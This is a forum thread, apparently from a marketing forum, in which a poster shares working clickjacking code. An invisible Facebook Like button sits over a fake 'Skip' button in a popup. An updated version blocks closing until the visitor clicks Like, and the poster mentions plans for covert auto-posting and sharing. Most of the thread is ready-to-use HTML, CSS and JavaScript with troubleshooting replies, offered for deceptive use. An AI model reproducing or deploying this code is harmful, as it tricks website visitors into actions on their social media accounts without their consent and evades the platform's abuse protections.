Capture Idle users from your website to FB - Auto Click Jack

mailicreate

Junior Member
Joined
Jan 17, 2015
Messages
129
Reaction score
28
UPDATE: Facebook has fixed that with a patch(probably after my client burnt their Like button). Here is a work around. Although you need to convince visitors to click some button. In my case I throw up an annoying popup with a SKIP button. Over the skip button is a hidden Facebook Like button. Clicking on the Skip button unknowingly clicks the FB Like. (If the user is logged into FB they wont notice it. otherwise FB login dialog appears)

CSS CODE: (Add after head tag)
Code:
<style>
.black_overlay{
        display: none;
        position: absolute;
        top: 0%;
        left: 0%;
        width: 100%;
        height: 100%;
        background-color: black;
        z-index:1001;
        -moz-opacity: 0.8;
        opacity:.80;
        filter: alpha(opacity=80);
    }
    .white_content {
        display: none;
        position: fixed;
        top: 25%;
        left: 25%;
        width: 50%;
        height: 50%;
        padding: 16px;
        border: 16px solid #333;
        background-color: white;
        z-index:1002;
        overflow: auto;
    }
.no-close .ui-dialog-titlebar-close {display: none }

</style>

Popup code: (Add this after the body tag)
Code:
[COLOR=#ff0000][B]Insert Facebook Javascript plugin code here. Get it from Facebook plugin page [/B][/COLOR]
<script>
window.onload= function(){
document.getElementById('light').style.display='block';
document.getElementById('fade').style.display='block';
};
</script>

<div id="light" class="white_content">Do you want to Register? If no click Skip to view content.
 
<div style="border:1px solid #333; width:49px;background: url('[COLOR=#ff0000][B]URL HIDDEN[/B][/COLOR]') no-repeat;"><div style="opacity:0" class="fb-like" data-href="[COLOR=#ff0000][B]YOUR FB PAGE URL[/B][/COLOR]" data-action="like""></div></div>
<a href = "javascript:void(0)" onclick = "document.getElementById('light').style.display='none';document.getElementById('fade').style.display='none'" style="color:#eee">X</a></div>
    <div id="fade" class="black_overlay"></div>

Visitors will click skip. And like your page.

Coming up next => click share FB post.
I am working with a CMS that
1. Allows users to post to FB Timeline from the CMS (working).
2. On visit to CMS website -> Auto register ->Auto post.
3. LIKE and SHARE Button integrated into the website for every post (working).
4. Visitors LIKE and SHARE post. (invisible background work). (almost done)

Let me know if this works. PM me for help.

EDIT: Added new code. I cant add the skip png image url. Add your own or pm me for the image url.

BTW: To find the close button do crtl + A. (Select all will highlight the hidden close button)
Success rate: 40% - 60%
 
Last edited:
I used a lot of likejackers, I can't remember to have ever seen one with such a short code :)
I'll give it a try and let you know how it works.
 
I used a lot of likejackers, I can't remember to have ever seen one with such a short code :)
I'll give it a try and let you know how it works.
I haven't included the Facebook JavaScript SDK code so it look short of 7-9 lines :)

I tried it but is not working... any suggestions?
You need to copy the Facebook JS SDK code. Make sure to paste it after the body tag. I cannot post it here as a new member. You can get it from Facebook developer Like plugins. If its still not working, remove the line initialLoad = TRUE and initialLoad = FALSE.
 
I already sent you a PM abut you don't answer. Please post the solution to get it working if not I don't get the point of this tread. LOl
 
Updated code: Success rate 40 - 60 %. New Features: User needs to Like to close popup. PM ME FOR WORKING DEMO LINK

Code:
<head>
<style>
.black_overlay{
        display: none;
        position: absolute;
        top: 0%;
        left: 0%;
        width: 100%;
        height: 100%;
        background-color: black;
        z-index:1001;
        -moz-opacity: 0.8;
        opacity:.80;
        filter: alpha(opacity=80);
    }
    .white_content {
        display: none;
        position: fixed;
        top: 25%;
        left: 25%;
        width: 50%;
        height: 50%;
        padding: 16px;
        border: 16px solid #333;
        background-color: white;
        z-index:1002;
        overflow: auto;
    }
.no-close .ui-dialog-titlebar-close {display: none }


</style>
</head>

BODY TAG
Code:
<body>
[B]Paste FB JavaScript Code in here.

[/B]<script>
var page_like_or_unlike_callback = function(url, html_element) {
var skip1 = document.getElementById("skip");
skip1.style.visibility="hidden";
var vaid= document.getElementById("aid");
vaid.style.color = "red";
}


window.onload= function(){
document.getElementById('light').style.display='block';
document.getElementById('fade').style.display='block';
FB.Event.subscribe('edge.create', page_like_or_unlike_callback);
};


</script>


<div id="light" class="white_content"><a id="aid" href = "javascript:void(0)" onclick = "document.getElementById('light').style.display='none';document.getElementById('fade').style.display='none'" style="color:#eee">X</a></br>


Do you want to Register? If no click Skip to view content.
 
<div id="skip" style="opacity:1;border:1px solid #333; width:49px;background: url('[B]SKIP PNG Button IMG[/B]') no-repeat;"><div style="opacity:0" class="fb-like" data-href="[B]Your FB page url[/B]" data-action="like""></div></div>
</div>
    <div id="fade" class="black_overlay"></div>
</body>
</html>
 
Last edited:
I did what you said, and still not working.

I tried it with your page url. It will ask to confirm the LIKE. This is because your page was flagged suspicious previously. Try with another clean page url with the new code above this post and it will work. If you dont believe me PM me for a demo link to my working page. Also make sure your website is HTML5 otherwise it will not work. You can get an iframe code from pm me, to work with previous html websites.
 
Back
Top